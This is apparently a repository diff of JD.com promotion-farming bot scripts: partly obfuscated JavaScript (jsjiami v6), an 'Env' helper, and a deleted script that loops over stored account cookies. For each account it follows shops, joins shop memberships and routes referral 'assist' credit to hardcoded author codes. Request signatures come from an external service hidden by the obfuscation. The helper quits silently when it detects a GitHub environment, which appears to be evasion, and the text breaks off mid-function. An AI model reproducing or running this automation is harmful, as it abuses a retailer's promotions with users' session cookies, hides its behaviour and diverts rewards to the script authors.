_0x169e2b[_0x27de('‫17')](_0x564cc4,_0x316683);},'\x4c\x63\x4b\x6e\x79':_0x169e2b[_0x27de('‫18')],'\x54\x45\x49\x61\x6f':function(_0x32cebc){return _0x169e2b[_0x27de('‫19')](_0x32cebc);}};$[_0x27de('‫1a')](_0x4540b3,(_0x497df1,_0x18ad2f,_0x1d037c)=>{if(_0x45d140[_0x27de('‮1b')](_0x45d140[_0x27de('‮1c')],_0x45d140[_0x27de('‮1c')])){try{if(_0x497df1){console[_0x27de('‫1d')](_0x497df1);}else{res=JSON[_0x27de('‫1e')](_0x1d037c);if(res[_0x27de('‮1f')]){if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}}catch(_0x487efd){console[_0x27de('‫1d')](_0x487efd);}finally{_0x45d140[_0x27de('‮25')](_0x24d014);}}else{console[_0x27de('‫1d')](_0x497df1);}});});}async function bindWithVender(_0x4bf9aa,_0x5a230c){var _0x5180ad={'\x4d\x59\x68\x4c\x43':function(_0x396660){return _0x396660();},'\x6d\x77\x78\x44\x6d':function(_0x4b2169,_0x405a0d){return _0x4b2169!==_0x405a0d;},'\x7a\x56\x69\x61\x6e':_0x27de('‫26'),'\x45\x41\x49\x42\x41':_0x27de('‫27'),'\x49\x6a\x73\x62\x4a':function(_0xcf4ea9,_0x3221b8){return _0xcf4ea9===_0x3221b8;},'\x55\x4b\x72\x68\x55':_0x27de('‫28'),'\x57\x6b\x62\x48\x4c':_0x27de('‫29'),'\x4c\x52\x48\x6a\x4c':_0x27de('‮2a'),'\x4f\x43\x43\x4e\x77':_0x27de('‫2b'),'\x57\x5a\x73\x59\x5a':_0x27de('‫2c'),'\x57\x73\x6b\x70\x78':_0x27de('‮2d'),'\x45\x64\x7a\x6d\x68':function(_0x148959,_0x176008,_0x319ba8){return _0x148959(_0x176008,_0x319ba8);},'\x50\x75\x57\x6e\x46':_0x27de('‮2e'),'\x47\x76\x6e\x52\x55':_0x27de('‫1'),'\x46\x56\x6a\x4b\x45':_0x27de('‫2'),'\x54\x6e\x62\x73\x4b':_0x27de('‫3'),'\x6a\x79\x46\x4f\x50':_0x27de('‮4'),'\x61\x4c\x7a\x6b\x57':function(_0x3768db,_0x1db8ba){return _0x3768db(_0x1db8ba);},'\x56\x6b\x6e\x6f\x74':_0x27de('‫5')};return h5st=await _0x5180ad[_0x27de('‮2f')](geth5st,_0x5180ad[_0x27de('‮30')],_0x4bf9aa),opt={'\x75\x72\x6c':_0x27de('‮31')+h5st,'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x5180ad[_0x27de('‮32')],'\x41\x63\x63\x65\x70\x74':_0x5180ad[_0x27de('‫33')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x5180ad[_0x27de('‮34')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x5180ad[_0x27de('‫35')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x5a230c+_0x27de('‮36')+_0x5180ad[_0x27de('‮37')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x5180ad[_0x27de('‫38')]}},new Promise(_0x2c2848=>{var _0x1f470d={'\x69\x50\x64\x65\x78':function(_0x4c0bea){return _0x5180ad[_0x27de('‫39')](_0x4c0bea);},'\x42\x77\x65\x53\x57':function(_0x240905,_0x2118e5){return _0x5180ad[_0x27de('‫3a')](_0x240905,_0x2118e5);},'\x79\x6e\x59\x71\x72':_0x5180ad[_0x27de('‫3b')],'\x70\x6b\x4f\x75\x73':_0x5180ad[_0x27de('‮3c')],'\x5a\x65\x59\x6e\x58':function(_0x2ff734,_0x50b6d9){return _0x5180ad[_0x27de('‮3d')](_0x2ff734,_0x50b6d9);},'\x69\x58\x4d\x4f\x79':_0x5180ad[_0x27de('‫3e')],'\x6d\x56\x77\x79\x58':function(_0x43cb7f,_0x5f0fa8){return _0x5180ad[_0x27de('‮3d')](_0x43cb7f,_0x5f0fa8);},'\x50\x62\x4f\x41\x42':_0x5180ad[_0x27de('‫3f')],'\x4f\x78\x6d\x55\x66':_0x5180ad[_0x27de('‫40')],'\x49\x62\x44\x6d\x51':_0x5180ad[_0x27de('‫41')],'\x62\x64\x67\x73\x4d':_0x5180ad[_0x27de('‫42')],'\x5a\x4b\x78\x4a\x4e':_0x5180ad[_0x27de('‮43')]};$[_0x27de('‫1a')](opt,(_0x311afb,_0x3b7aab,_0x4c2873)=>{var _0x53384e={'\x6d\x4d\x51\x6b\x76':function(_0x26e196){return _0x1f470d[_0x27de('‫44')](_0x26e196);}};try{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫46')],_0x1f470d[_0x27de('‮47')])){if(_0x311afb){if(_0x1f470d[_0x27de('‫48')](_0x1f470d[_0x27de('‫49')],_0x1f470d[_0x27de('‫49')])){console[_0x27de('‫1d')](_0x311afb);}else{console[_0x27de('‫1d')](error);}}else{if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4b')],_0x1f470d[_0x27de('‮4c')])){_0x53384e[_0x27de('‮4d')](_0x2c2848);}else{res=JSON[_0x27de('‫1e')](_0x4c2873);if(res[_0x27de('‮1f')]){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4e')],_0x1f470d[_0x27de('‫4e')])){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}else{console[_0x27de('‫1d')](_0x311afb);}}}}}else{Host=process[_0x27de('‮51')][_0x27de('‫52')];}}catch(_0x317968){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‮53')],_0x1f470d[_0x27de('‮53')])){console[_0x27de('‫1d')](_0x317968);}else{$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}finally{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫54')],_0x1f470d[_0x27de('‫54')])){_0x1f470d[_0x27de('‫44')](_0x2c2848);}else{_0x1f470d[_0x27de('‫44')](_0x2c2848);}}});});}function geth5st(_0x1c2dc4,_0x38bbf9){var _0xad3eae={'\x76\x59\x42\x64\x48':function(_0xb6682a,_0x1dbeb1){return _0xb6682a===_0x1dbeb1;},'\x42\x4d\x46\x6b\x79':_0x27de('‮55'),'\x69\x75\x7a\x6b\x51':function(_0x521e0c,_0x1ffbd9){return _0x521e0c!==_0x1ffbd9;},'\x67\x48\x77\x45\x7a':_0x27de('‮56'),'\x53\x65\x4c\x46\x71':_0x27de('‮57'),'\x45\x6e\x58\x7a\x59':function(_0x4fa54e,_0x1f1dc2){return _0x4fa54e===_0x1f1dc2;},'\x50\x7a\x78\x71\x48':_0x27de('‮58'),'\x4e\x54\x41\x51\x50':function(_0x3fd51b,_0x32a444){return _0x3fd51b(_0x32a444);},'\x6b\x45\x71\x7a\x71':_0x27de('‫59'),'\x6a\x56\x58\x70\x71':_0x27de('‫5a'),'\x41\x6d\x4e\x72\x49':_0x27de('‮5b'),'\x71\x69\x42\x77\x67':_0x27de('‫5c'),'\x6c\x59\x56\x78\x6b':function(_0x2a05e2,_0x15824){return _0x2a05e2*_0x15824;},'\x44\x66\x5a\x6f\x68':_0x27de('‫5d'),'\x58\x43\x7a\x6e\x76':function(_0x46d10b,_0x5b5da1){return _0x46d10b*_0x5b5da1;}};return new Promise(async _0x573221=>{var _0x1c0efb={'\x4a\x47\x49\x4a\x4a':function(_0x30195c,_0x3fe97e){return _0xad3eae[_0x27de('‮5e')](_0x30195c,_0x3fe97e);},'\x63\x4c\x75\x59\x57':_0xad3eae[_0x27de('‫5f')],'\x4a\x65\x6d\x76\x48':function(_0x41b061,_0x2c0980){return _0xad3eae[_0x27de('‫60')](_0x41b061,_0x2c0980);},'\x54\x53\x65\x61\x46':_0xad3eae[_0x27de('‫61')],'\x66\x57\x66\x4f\x54':_0xad3eae[_0x27de('‮62')],'\x7a\x4f\x48\x74\x48':function(_0x1029f8,_0x21337a){return _0xad3eae[_0x27de('‮63')](_0x1029f8,_0x21337a);},'\x54\x5a\x6e\x42\x6a':_0xad3eae[_0x27de('‫64')],'\x6b\x47\x41\x51\x44':function(_0x1b9d1f,_0x3ee921){return _0xad3eae[_0x27de('‫65')](_0x1b9d1f,_0x3ee921);}};let _0x23db17={'\x61\x70\x70\x49\x64':_0xad3eae[_0x27de('‫66')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0xad3eae[_0x27de('‫67')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x1c2dc4,'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x38bbf9),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0xad3eae[_0x27de('‫68')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x27de('‮24')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0x2402da='';let _0x25911c=[_0xad3eae[_0x27de('‮69')]];if(process[_0x27de('‮51')][_0x27de('‫52')]){_0x2402da=process[_0x27de('‮51')][_0x27de('‫52')];}else{_0x2402da=_0x25911c[Math[_0x27de('‫6a')](_0xad3eae[_0x27de('‫6b')](Math[_0x27de('‫6c')](),_0x25911c[_0x27de('‮6d')]))];}let _0x5f5ad9={'\x75\x72\x6c':_0x27de('‮6e'),'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x23db17),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x2402da,'Content-Type':_0xad3eae[_0x27de('‮6f')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0xad3eae[_0x27de('‫70')](0x1e,0x3e8)};$[_0x27de('‮71')](_0x5f5ad9,async(_0x4a1749,_0x300e08,_0x23db17)=>{if(_0x1c0efb[_0x27de('‫72')](_0x1c0efb[_0x27de('‫73')],_0x1c0efb[_0x27de('‫73')])){try{if(_0x4a1749){if(_0x1c0efb[_0x27de('‮74')](_0x1c0efb[_0x27de('‮75')],_0x1c0efb[_0x27de('‮76')])){_0x23db17=await geth5st[_0x27de('‮77')](this,arguments);}else{if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}else{}}catch(_0x580180){if(_0x1c0efb[_0x27de('‫78')](_0x1c0efb[_0x27de('‮79')],_0x1c0efb[_0x27de('‮79')])){$[_0x27de('‫7a')](_0x580180,_0x300e08);}else{if(_0x4a1749){console[_0x27de('‫1d')](_0x4a1749);}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}}}finally{_0x1c0efb[_0x27de('‫7b')](_0x573221,_0x23db17);}}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}});});};_0xod7='jsjiami.com.v6'; -function Env(t,e){"undefined"!=typeof process&&JSON.stringify(process.env).indexOf("GITHUB")>-1&&process.exit(0);class s{constructor(t){this.env=t}send(t,e="GET"){t="string"==typeof t?{url:t}:t;let s=this.get;return"POST"===e&&(s=this.post),new Promise((e,i)=>{s.call(this,t,(t,s,r)=>{t?i(t):e(s)})})}get(t){return this.send.call(this.env,t)}post(t){return this.send.call(this.env,t,"POST")}}return new class{constructor(t,e){this.name=t,this.http=new s(this),this.data=null,this.dataFile="box.dat",this.logs=[],this.isMute=!1,this.isNeedRewrite=!1,this.logSeparator="\n",this.startTime=(new Date).getTime(),Object.assign(this,e),this.log("",`🔔${this.name}, 开始!`)}isNode(){return"undefined"!=typeof module&&!!module.exports}isQuanX(){return"undefined"!=typeof $task}isSurge(){return"undefined"!=typeof $httpClient&&"undefined"==typeof $loon}isLoon(){return"undefined"!=typeof $loon}toObj(t,e=null){try{return JSON.parse(t)}catch{return e}}toStr(t,e=null){try{return JSON.stringify(t)}catch{return e}}getjson(t,e){let s=e;const i=this.getdata(t);if(i)try{s=JSON.parse(this.getdata(t))}catch{}return s}setjson(t,e){try{return this.setdata(JSON.stringify(t),e)}catch{return!1}}getScript(t){return new Promise(e=>{this.get({url:t},(t,s,i)=>e(i))})}runScript(t,e){return new Promise(s=>{let i=this.getdata("@chavy_boxjs_userCfgs.httpapi");i=i?i.replace(/\n/g,"").trim():i;let r=this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout");r=r?1*r:20,r=e&&e.timeout?e.timeout:r;const[o,h]=i.split("@"),n={url:`http://${h}/v1/scripting/evaluate`,body:{script_text:t,mock_type:"cron",timeout:r},headers:{"X-Key":o,Accept:"*/*"}};this.post(n,(t,e,i)=>s(i))}).catch(t=>this.logErr(t))}loaddata(){if(!this.isNode())return{};{this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e);if(!s&&!i)return{};{const i=s?t:e;try{return JSON.parse(this.fs.readFileSync(i))}catch(t){return{}}}}}writedata(){if(this.isNode()){this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e),r=JSON.stringify(this.data);s?this.fs.writeFileSync(t,r):i?this.fs.writeFileSync(e,r):this.fs.writeFileSync(t,r)}}lodash_get(t,e,s){const i=e.replace(/\[(\d+)\]/g,".$1").split(".");let r=t;for(const t of i)if(r=Object(r)[t],void 0===r)return s;return r}lodash_set(t,e,s){return Object(t)!==t?t:(Array.isArray(e)||(e=e.toString().match(/[^.[\]]+/g)||[]),e.slice(0,-1).reduce((t,s,i)=>Object(t[s])===t[s]?t[s]:t[s]=Math.abs(e[i+1])>>0==+e[i+1]?[]:{},t)[e[e.length-1]]=s,t)}getdata(t){let e=this.getval(t);if(/^@/.test(t)){const[,s,i]=/^@(.*?)\.(.*?)$/.exec(t),r=s?this.getval(s):"";if(r)try{const t=JSON.parse(r);e=t?this.lodash_get(t,i,""):e}catch(t){e=""}}return e}setdata(t,e){let s=!1;if(/^@/.test(e)){const[,i,r]=/^@(.*?)\.(.*?)$/.exec(e),o=this.getval(i),h=i?"null"===o?null:o||"{}":"{}";try{const e=JSON.parse(h);this.lodash_set(e,r,t),s=this.setval(JSON.stringify(e),i)}catch(e){const o={};this.lodash_set(o,r,t),s=this.setval(JSON.stringify(o),i)}}else s=this.setval(t,e);return s}getval(t){return this.isSurge()||this.isLoon()?$persistentStore.read(t):this.isQuanX()?$prefs.valueForKey(t):this.isNode()?(this.data=this.loaddata(),this.data[t]):this.data&&this.data[t]||null}setval(t,e){return this.isSurge()||this.isLoon()?$persistentStore.write(t,e):this.isQuanX()?$prefs.setValueForKey(t,e):this.isNode()?(this.data=this.loaddata(),this.data[e]=t,this.writedata(),!0):this.data&&this.data[e]||null}initGotEnv(t){this.got=this.got?this.got:require("got"),this.cktough=this.cktough?this.cktough:require("tough-cookie"),this.ckjar=this.ckjar?this.ckjar:new this.cktough.CookieJar,t&&(t.headers=t.headers?t.headers:{},void 0===t.headers.Cookie&&void 0===t.cookieJar&&(t.cookieJar=this.ckjar))}get(t,e=(()=>{})){t.headers&&(delete t.headers["Content-Type"],delete t.headers["Content-Length"]),this.isSurge()||this.isLoon()?(this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.get(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)})):this.isQuanX()?(this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t))):this.isNode()&&(this.initGotEnv(t),this.got(t).on("redirect",(t,e)=>{try{if(t.headers["set-cookie"]){const s=t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString();s&&this.ckjar.setCookieSync(s,null),e.cookieJar=this.ckjar}}catch(t){this.logErr(t)}}).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)}))}post(t,e=(()=>{})){if(t.body&&t.headers&&!t.headers["Content-Type"]&&(t.headers["Content-Type"]="application/x-www-form-urlencoded"),t.headers&&delete t.headers["Content-Length"],this.isSurge()||this.isLoon())this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.post(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)});else if(this.isQuanX())t.method="POST",this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t));else if(this.isNode()){this.initGotEnv(t);const{url:s,...i}=t;this.got.post(s,i).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)})}}time(t,e=null){const s=e?new Date(e):new Date;let i={"M+":s.getMonth()+1,"d+":s.getDate(),"H+":s.getHours(),"m+":s.getMinutes(),"s+":s.getSeconds(),"q+":Math.floor((s.getMonth()+3)/3),S:s.getMilliseconds()};/(y+)/.test(t)&&(t=t.replace(RegExp.$1,(s.getFullYear()+"").substr(4-RegExp.$1.length)));for(let e in i)new RegExp("("+e+")").test(t)&&(t=t.replace(RegExp.$1,1==RegExp.$1.length?i[e]:("00"+i[e]).substr((""+i[e]).length)));return t}msg(e=t,s="",i="",r){const o=t=>{if(!t)return t;if("string"==typeof t)return this.isLoon()?t:this.isQuanX()?{"open-url":t}:this.isSurge()?{url:t}:void 0;if("object"==typeof t){if(this.isLoon()){let e=t.openUrl||t.url||t["open-url"],s=t.mediaUrl||t["media-url"];return{openUrl:e,mediaUrl:s}}if(this.isQuanX()){let e=t["open-url"]||t.url||t.openUrl,s=t["media-url"]||t.mediaUrl;return{"open-url":e,"media-url":s}}if(this.isSurge()){let e=t.url||t.openUrl||t["open-url"];return{url:e}}}};if(this.isMute||(this.isSurge()||this.isLoon()?$notification.post(e,s,i,o(r)):this.isQuanX()&&$notify(e,s,i,o(r))),!this.isMuteLog){let t=["","==============📣系统通知📣=============="];t.push(e),s&&t.push(s),i&&t.push(i),console.log(t.join("\n")),this.logs=this.logs.concat(t)}}log(...t){t.length>0&&(this.logs=[...this.logs,...t]),console.log(t.join(this.logSeparator))}logErr(t,e){const s=!this.isSurge()&&!this.isQuanX()&&!this.isLoon();s?this.log("",`❗️${this.name}, 错误!`,t.stack):this.log("",`❗️${this.name}, 错误!`,t)}wait(t){return new Promise(e=>setTimeout(e,t))}done(t={}){const e=(new Date).getTime(),s=(e-this.startTime)/1e3;this.log("",`🔔${this.name}, 结束! 🕛 ${s} 秒`),this.log(),(this.isSurge()||this.isQuanX()||this.isLoon())&&$done(t)}}(t,e)} diff --git a/jd_lzdz1_customized611.js b/jd_lzdz1_customized611.js deleted file mode 100644 index 5ae7a63..0000000 --- a/jd_lzdz1_customized611.js +++ /dev/null @@ -1,570 +0,0 @@ -/* -大牌“粽”情献礼 -*/ -const $ = new Env("大牌“粽”情献礼"); -const jdCookieNode = $.isNode() ? require("./jdCookie.js") : ""; -const notify = $.isNode() ? require("./sendNotify") : ""; -let cookiesArr = [], cookie = "", message = ""; -let ownCode = null; -let authorCodeList = []; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]); - }); - if (process.env.JD_DEBUG && process.env.JD_DEBUG === "false") console.log = () => {}; -} else { - let cookiesData = $.getdata("CookiesJD") || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map((item) => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata("CookieJD2"), $.getdata("CookieJD")]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter((item) => !!item); -} -!(async () => { - $.getAuthorCodeListerr = false; - if (!cookiesArr[0]) { - $.msg($.name, "【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取", "https://bean.m.jd.com/bean/signIndex.action", { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - // authorCodeList = await getAuthorCodeList('https://gitee.com/fatelight/code/raw/master/lzdz112.json') - // if ($.getAuthorCodeListerr === false) { - // authorCodeList = [ - // '917746a95cae46618c8f6b0ff55dfbc2', - // ] - // } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i]; - originCookie = cookiesArr[i]; - newCookie = ""; - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]); - $.index = i + 1; - $.isLogin = true; - $.nickName = ""; - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - // if ($.isNode()) { - // await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - // } - continue; - } - $.bean = 0; - $.ADID = getUUID("xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", 1); - $.UUID = getUUID("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); - authorCodeList = [ - '853b20ddd111461391f11c900faf6ca2', - '3f98ed080eb4415fb47af2355de3aa31', - '5d92c2ed2a51448b90ec3255c1cc962c', - 'e525b24bcce942b1a6b049fa903da462', - 'd1d4135b7a84405283121e8f25f61221' - ]; - // $.authorCode = authorCodeList[random(0, authorCodeList.length)]; - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}`; - $.randomCode = random(1000000, 9999999); - $.activityId = "dzlhkk17e740478a2c5580a664c23f"; - $.activityShopId = "1000003443"; - $.activityUrl = `https://lzdz1-isv.isvjcloud.com/dingzhi/customized/common/activity/${$.authorNum}?activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}&adsource=SD&shareuserid4minipg=${encodeURIComponent($.secretPin)}&shopid=undefined&lng=00.000000&lat=00.000000&sid=&un_area=`; - await member(); - // await $.wait(1000); - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。`; - } - } - } - if (message !== "") { - if ($.isNode()) { - await notify.sendNotify($.name, message, "", `\n`); - } else { - $.msg($.name, "有点儿收获", message); - } - } -})() - .catch((e) => { - $.log("", `❌ ${$.name}, 失败! 原因: ${e}!`, ""); - }) - .finally(() => { - $.done(); - }); - -async function member() { - $.token = null; - $.secretPin = null; - $.openCardActivityId = null; - $.addScore = 1 - lz_cookie = {}; - await getFirstLZCK(); - await getToken(); - await task("dz/common/getSimpleActInfoVo", `activityId=${$.activityId}`, 1); - if ($.token) { - await getMyPing(); - if ($.secretPin) { - console.log("去助力 -> " + $.authorCode); - await taskaccessLog("common/accessLogWithAD", `venderId=${$.activityShopId}&code=99&pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&pageUrl=${$.activityUrl}&subType=app&adSource=FLP`, 1); - // await task("wxActionCommon/getUserInfo", `pin=${encodeURIComponent($.secretPin)}`, 1); - if ($.index === 1) { - await task("linkgame/activity/content", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`, 0, 1); - } else { - await task("linkgame/activity/content", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`); - } - $.log("关注店铺"); - await task("opencard/follow/shop", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - await task("taskact/common/drawContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - await task("linkgame/task/opencard/info", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`); - $.log("加入店铺会员"); - if ($.openCardList) { - for (const vo of $.openCardList) { - // console.log(vo) - $.log(`>>> 去加入${vo.name} ${vo.venderId}`); - // await task("crm/pageVisit/insertCrmPageVisit", `venderId=1000000576&elementId=入会跳转&pageId=dzlhkk068d4d0ab8a6609723002f50&pin=${encodeURIComponent($.secretPin)}`, 1); - // await $.wait(500); - // await getFirstLZCK(); - // await getToken(); - if (vo.status == 0) { - await getShopOpenCardInfo({ venderId: `${vo.venderId}`, channel: "401" }, vo.venderId); - // console.log($.openCardActivityId) - await bindWithVender({ venderId: `${vo.venderId}`, bindByVerifyCodeFlag: 1, registerExtend: {}, writeChildFlag: 0, activityId: 2317870, channel: 401 }, vo.venderId); - await $.wait(500); - } else { - $.log(`>>> 已经是会员`); - } - } - } else { - $.log("没有获取到对应的任务。\n"); - } - - // $.taskList = [] - // await dsb($.openCardList) - // await Promise.all($.taskList) - await task("linkgame/checkOpenCard", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`); - console.log("去助力 -> " + $.authorCode); - await task("linkgame/assist/status", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - await task("linkgame/assist", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - // await task('linkgame/help/list', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - - // await task('linkgame/task/info', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - // console.log('任务 -> ') - // await $.wait(2000) - // await task('opencard/addCart', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('linkgame/sendAllCoupon', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await getFirstLZCK() - // await getToken(); - // console.log('抽奖 -> ') - // await $.wait(2000) - // await task('linkgame/draw', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&pin=${encodeURIComponent($.secretPin)}`); - // console.log('100 -> ') - // await getFirstLZCK() - // await getToken(); - // await $.wait(2000) - // await task('linkgame/draw/record', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&pin=${encodeURIComponent($.secretPin)}`); - } - } -} - -function dsb(openCardList){ - if (openCardList) { - for (const vo of openCardList) { - // console.log(vo) - $.log(`>>> 去加入${vo.name} ${vo.venderId}`); - if (vo.status == 0) { - // bindWithVender({ venderId: `${vo.venderId}`, bindByVerifyCodeFlag: 1, registerExtend: {}, writeChildFlag: 0, activityId: 2317870, channel: 401 }, vo.venderId); - $.taskList.push(bindWithVender({ venderId: `${vo.venderId}`, bindByVerifyCodeFlag: 1, registerExtend: {}, writeChildFlag: 0, activityId: 2317870, channel: 401 }, vo.venderId)) - } else { - $.log(`>>> 已经是会员`); - } - } - } else { - $.log("没有获取到对应的任务。\n"); - } -} - -function task(function_id, body, isCommon = 0, own = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.result) { - switch (function_id) { - case "dz/common/getSimpleActInfoVo": - $.jdActivityId = data.data.jdActivityId; - $.venderId = data.data.venderId; - $.activityType = data.data.activityType; - // console.log($.venderId) - break; - case "wxActionCommon/getUserInfo": - break; - case "linkgame/activity/content": - if (!data.data.hasEnd) { - $.log(`开启【${data.data.activity["name"]}】活动`); - $.log("-------------------"); - if ($.index === 1) { - ownCode = data.data.actor["actorUuid"]; - console.log(ownCode); - } - $.actorUuid = data.data.actor["actorUuid"]; - } else { - $.log("活动已经结束"); - } - // console.log(data) - break; - case "linkgame/task/opencard/info": - $.openCardList = data.data.followShopList; - $.openCardStatus = data.data; - // console.log(data) - break; - case "opencard/follow/shop": - console.log(data); - if (data.data) { - $.addScore = data.data.addScore - } - break; - case "linkgame/sign": - console.log(data); - break; - case "opencard/addCart": - if (data.data) { - console.log(data.data); - } - break; - case "linkgame/sendAllCoupon": - if (data.data) { - console.log(data.data); - } - - break; - case "interaction/write/writePersonInfo": - console.log(data); - break; - case "linkgame/draw": - console.log(data); - break; - case "linkgame/draw/record": - console.log(data.data); - break; - case "linkgame/assist/status": - $.log(JSON.stringify(data)); - break; - case "linkgame/assist": - $.log(JSON.stringify(data)); - break; - case "opencard/help/list": - $.log(JSON.stringify(data)); - break; - default: - // $.log(JSON.stringify(data)) - break; - } - } else { - // $.log(JSON.stringify(data)) - } - } else { - // $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); 